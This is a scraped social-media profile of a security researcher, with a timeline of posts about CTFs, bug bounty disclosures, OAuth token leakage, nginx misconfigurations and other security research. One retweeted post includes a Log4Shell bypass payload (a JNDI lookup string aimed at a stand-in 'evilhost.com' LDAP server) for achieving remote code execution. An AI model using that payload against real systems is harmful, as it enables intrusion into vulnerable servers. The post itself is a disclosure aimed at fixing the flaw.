almroot Profile Banner
Fredrik N. Almroth Profile
Fredrik N. Almroth

@almroot

Followers
3K
Following
2K
Media
28
Statuses
921

Co-Founder & Security Researcher at @detectify. I code things to hack stuff. PGP/MIT: 0xEDF8D9828B06A7F7 #shellpopper

Sweden
Joined November 2011
Don't wanna be here? Send us removal request.
@HackingForSoju
HackingForSoju
3 years
🇸🇪Midnight Sun CTF is back for it's 6th straight year! Registration is open here: https://t.co/N4U2SzYfCq 🏆Qualifiers will run from 08 April, 2023 11:00 UTC -- 09 April, 2023 11:00 UTC 🥇On-site finals are on 18 August. As always check https://t.co/gRgvz52cA5 for details
1
5
22
@sans_isc
SANS.edu Internet Storm Center
3 years
OpenSSL 3.0.7 is out. TL&DR: Punycode issue with international domains used in certs. Needs CA to sign malicious cert. Doesn't look like a "huge deal" IMHO. Relax.. Patch.. Repeat... #openssl
4
100
225
@SEC_T_org
SEC-T
3 years
Recording of “JavaScript Prototype Poisoning, an unexplored bug-class, and it’s everywhere“ by Christoffer Jerkeby & Anton Linné is up: https://t.co/Fr8AcrHz54
0
9
21
@stokfredrik
STÖK ✌️
3 years
How to turn bugs into a "passive" income stream! ft @detectify’s @almroot https://t.co/GVh2AkRKp4 #cybersecurity #bugbounty
3
36
131
@fransrosen
Frans Rosén
3 years
I was finally able to disclose one of the examples from my last blog post https://t.co/pODPvDUOU9 Here's the PoC-movie from the report to Reddit:
@disclosedh1
publiclyDisclosed
3 years
Reddit disclosed a bug submitted by fransrosen: https://t.co/K1f1kRd7WU - Bounty: $10,000 #hackerone #bugbounty
11
105
422
@fransrosen
Frans Rosén
3 years
I decided to make a homage-post to @homakov and @Nirgoldshlager about different OAuth-token leakage methods I've been researching – ten years after their blog posts that inspired me to start hunt for bugs ♥️ thank you. https://t.co/pODPvDUOU9
Tweet card summary image
labs.detectify.com
Combining response-type switching, invalid state and redirect-uri quirks using OAuth, with third-party javascript-inclusions has multiple vulnerable scenarios where authorization codes or tokens...
20
376
983
@stokfredrik
STÖK ✌️
4 years
Had a great conversation about @detectify ‘s crowdsource program with @almroot today in the studio. Def a interesting way of creating a passive income flow, submit a finding, preferably unauth, get it verified and get paid every time it hits / fires on any of their customers!
2
2
27
@infosec_au
shubs
4 years
Bypassing CDN WAF’s with Alternate Domain Routing https://t.co/7lVmfuR5Ru
11
111
329
@DC3VDP
DC3 VDP
4 years
The @DeptofDefense VDP #ResearcheroftheMonth for January 2022 is @almroot. They submitted a critical report on manipulating DNS that enabled them to add DNS records to a DoD server! #VDPHackersFTW #cybersecurity
1
9
24
@albinowax
James Kettle
4 years
Just three days remaining to cast your vote for the top 10 hacking techniques of 2021! Massive thanks to everyone who has already taken part; more voters means higher quality results. https://t.co/hROcjUsg0Z
Tweet card summary image
portswigger.net
Welcome to the community vote for the Top 10 Web Hacking Techniques of 2021.
3
26
107
@infosec_au
shubs
4 years
Damn. This is really cool. Achieving RCE via LFI using Nginx as a way to upload a temporary file, even when PHP is hardened so other techniques will fail -
6
237
777
@marcioalm
Márcio Almeida
4 years
FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n
15
371
969
@whataweekhuh
What a week, huh? all Wednesdays
4 years
138
19K
97K
@bNamed
bNamed
4 years
Whole .cd zone down due to expired .net domain name (again) https://t.co/iyxoA4zJ9E @almroot
1
2
2
@fransrosen
Frans Rosén
4 years
I found some permission issues when hacking Apple CloudKit. I wrote about three of them @detectify labs, one where I accidentally deleted all shared Apple Shortcuts. https://t.co/bwNOLJIeIo
17
188
748
@intigriti
Intigriti
4 years
Alternate data streams sound like this 🤯 to you? Well, thankfully we have @almroot jumping in to help, telling us how to leak source code or bypass authentication with that 🦀 #bugbountytips 👇
2
71
268
@CayreRomain
Romain Cayre
5 years
I just released RadioSploit, an Android application allowing to sniff and inject Zigbee,Mosart and Enhanced ShockBurst packets from a Samsung Galaxy S20 smartphone without requiring any additional hardware:it diverts the Bluetooth controller to add new offensive capabilities.1/14
4
127
317
@fransrosen
Frans Rosén
5 years
We did some fun tricks with nginx on bug bounties a while back, and made a post about out the configurations being vulnerable https://t.co/TJ8ma1tKjJ
Tweet card summary image
labs.detectify.com
We found some interesting middleware misconfigurations and potential exploits affecting Nginx web servers, load balancers, and proxies.
8
242
535
@almroot
Fredrik N. Almroth
5 years
New campaign targeting security researchers "Threat Analysis Group has identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations." https://t.co/ai6AG61E5Z
0
0
1